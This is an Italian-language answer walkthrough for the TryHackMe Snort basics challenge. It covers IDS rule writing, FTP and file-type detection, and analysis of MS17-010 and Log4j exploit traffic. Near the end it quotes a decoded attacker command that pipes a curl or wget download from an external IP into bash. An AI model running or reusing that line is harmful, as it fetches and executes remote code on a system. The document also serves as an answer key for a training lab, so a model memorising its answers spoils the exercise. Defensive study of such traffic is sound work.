Abbiamo trattato l'utilizzo di Snort per analizzare il traffico FTP e HTTP creando e configurando le regole appropriate. Per applicare ciò che abbiamo imparato, abbiamo analizzato alcune acquisizioni di rete utilizzando Snort per testare le regole create e rilevare modelli di traffico. Questo faceva parte TryHackMe Snort Challenge – Le nozioni di base.
Corso completo Splunk SIEM con scenari pratici
Punti salienti
SNORT è un sistema di rilevamento e prevenzione delle intrusioni di rete open source e basato su regole (NIDS/NIPS). È stato sviluppato e tuttora gestito da Martin Roesch, contributori open source e dal team Cisco Talos. Capacità di Snort
- Analisi del traffico in tempo reale
- Rilevamento di attacchi e sonde
- Registrazione dei pacchetti
- Analisi del protocollo
- Avvisi in tempo reale
- Moduli e plugin
- Preprocessori
- Supporto multipiattaforma! (Linux e Windows)
Modalità operative dell'IDS Snort
Modalità annusatore
– Leggere i pacchetti IP e richiederli nell'applicazione console.Modalità registratore di pacchetti
– Registra tutti i pacchetti IP (in entrata e in uscita) che visitano la rete.Modalità NIDS e NIPS
: registra/rilascia i pacchetti considerati dannosi in base alle regole definite dall'utente
Risposte in camera | Sfida Snort – Le basi
Qual è il numero di pacchetti rilevati?
Nota: È necessario rispondere correttamente a questa domanda prima di rispondere al resto delle domande di questa attività.
328
Esaminare il file di registro.
Qual è l'indirizzo di destinazione del pacchetto 63?
145.254.160.237
Esaminare il file di registro.
Qual è il numero ACK del pacchetto 64?
0x38AFFFF3
Esaminare il file di registro.
Qual è il numero SEQ del pacchetto 62?
0x38AFFFF3
W
Esaminare il file di registro.
Qual è il TTL del pacchetto 65?
128
Esaminare il file di registro.
Qual è l'IP di origine del pacchetto 65?
145.254.160.237
Esaminare il file di registro.
Qual è la porta di origine del pacchetto 65?
3372
Utilizzare il file pcap fornito.
Scrivi regole per rilevare “tutta la porta TCP 21"traffico nel pcap specificato.
Qual è il numero di pacchetti rilevati?
614
Esaminare il file di registro.
Qual è il nome del servizio FTP?
Servizio FTP Microsoft
Cancella i file di registro e di allarme precedenti.
Disattiva/commenta le vecchie regole.
Scrivi una regola per rilevare i tentativi di accesso FTP falliti nel pcap specificato.
Qual è il numero di pacchetti rilevati?
41
Cancella i file di registro e di allarme precedenti.
Disattiva/commenta la vecchia regola.
Scrivi una regola per rilevare gli accessi FTP riusciti nel pcap specificato.
Qual è il numero di pacchetti rilevati?
1
Cancella i file di registro e di allarme precedenti.
Disattiva/commenta la vecchia regola.
Scrivi una regola per rilevare gli errori FTP tentativi di accesso con un nome utente valido ma una password errata o nessuna password.
Qual è il numero di pacchetti rilevati?
42
Cancella i file di registro e di allarme precedenti.
Disattiva/commenta la vecchia regola.
Scrivi una regola per rilevare gli errori FTP tentativi di accesso con nome utente "Amministratore" ma password errata o nessuna password.
Qual è il numero di pacchetti rilevati?
7
Passare alla cartella delle attività.
Utilizzare il file pcap fornito.
Scrivi una regola per rilevare il file PNG nel pcap specificato.
Esaminare i registri e identificare il nome del software incorporato nel pacchetto.
Adobe Imagereadyq
Cancella i file di registro e di allarme precedenti.
Disattiva/commenta la vecchia regola.
Scrivi una regola per rilevare il file GIF nel pcap specificato.
Esaminare i registri e identificare il formato dell'immagine incorporato nel pacchetto.
GIF89a
Passare alla cartella delle attività.
Utilizzare il file pcap fornito.
Scrivi una regola per rilevare il metafile torrent nel pcap specificato.
Qual è il numero di pacchetti rilevati?
2
Esaminare i file di registro/allarme.
Qual è il nome dell'applicazione torrent?
bittorrent
Esaminare i file di registro/allarme.
Qual è il tipo MIME (Multifunction Internet Mail Extensions) del metafile torrent?
applicazione/x-bittorrent
Esaminare i file di registro/allarme.
Qual è il nome host del metafile torrent?
tracker2.torrentbox.com
In questa sezione è necessario correggere gli errori di sintassi nei file di regole specificati.
Puoi testare ogni set di regole con la seguente struttura di comandi;
sudo snort -c local-X.rules -r mx-1.pcap -A console
Correggi l'errore di sintassi nel file local-1.rules e fallo funzionare senza intoppi.
Qual è il numero dei pacchetti rilevati?
16
Correggi l'errore di sintassi nel file local-2.rules e fallo funzionare senza intoppi.
Qual è il numero dei pacchetti rilevati?
68
Correggi l'errore di sintassi nel file local-3.rules e fallo funzionare senza intoppi.
Qual è il numero dei pacchetti rilevati?
87
Correggi l'errore di sintassi nel file local-4.rules e fallo funzionare senza intoppi.
Qual è il numero dei pacchetti rilevati?
90
Correggi l'errore di sintassi nel file local-5.rules e fallo funzionare senza intoppi.
Qual è il numero dei pacchetti rilevati?
155
Correggi l'errore logico nel file local-6.rules e fallo funzionare senza intoppi per creare avvisi.
Qual è il numero dei pacchetti rilevati?
2
Correggi l'errore logico nel file local-7.rules e fallo funzionare senza intoppi per creare avvisi.
Qual è il nome dell'opzione richiesta:
msg
Passare alla cartella delle attività.
Utilizzare il file pcap fornito.
Utilizzare il file di regole fornito (local.rules) per indagare sullo sfruttamento ms1710.
Qual è il numero di pacchetti rilevati?
25154
Cancella i file di registro e di allarme precedenti.
Utilizza il file vuoto local-1.rules per scrivere una nuova regola per rilevare i payload contenenti la parola chiave "\IPC$".
Qual è il numero di pacchetti rilevati?
12
Esaminare i file di registro/allarme.
Che cosa è il percorso richiesto?
\192.168.116.138\IPC$
Qual è il punteggio CVSS v2 della vulnerabilità MS17-010?
9.3
Utilizzare il file pcap fornito.
Utilizzare il file di regole fornito (local.rules) per indagare sullo sfruttamento di log4j.
Qual è il numero di pacchetti rilevati?
26
Esaminare i file di registro/allarme.
Quante regole sono state attivate?.
4
Esaminare i file di registro/allarme.
Quali sono le prime sei cifre dei sid delle regole attivate?
210037
Cancella i file di registro e di allarme precedenti.
Utilizza il file vuoto local-1.rules per scrivere una nuova regola per rilevare i payload dei pacchetti tra 770 e 855 byte.
Qual è il numero di pacchetti rilevati?
41
Esaminare i file di registro/allarme.
Che cosa è il nome dell'algoritmo di codifica utilizzato?
base64
Esaminare i file di registro/allarme.
Che cosa è l'ID IP del pacchetto corrispondente?
62808
Esaminare i file di registro/allarme.
Decodifica il comando codificato.
Qual è il comando dell'attaccante?
(curl -s 45.155.205.233:5874/162.0.228.253:80||wget -q -O- 45.155.205.233:5874/162.0.228.253:80)|bash
Qual è il punteggio CVSS v2 della vulnerabilità Log4j?
9.3
Video Soluzione | TryHackMe Snort Challenge – Le nozioni di base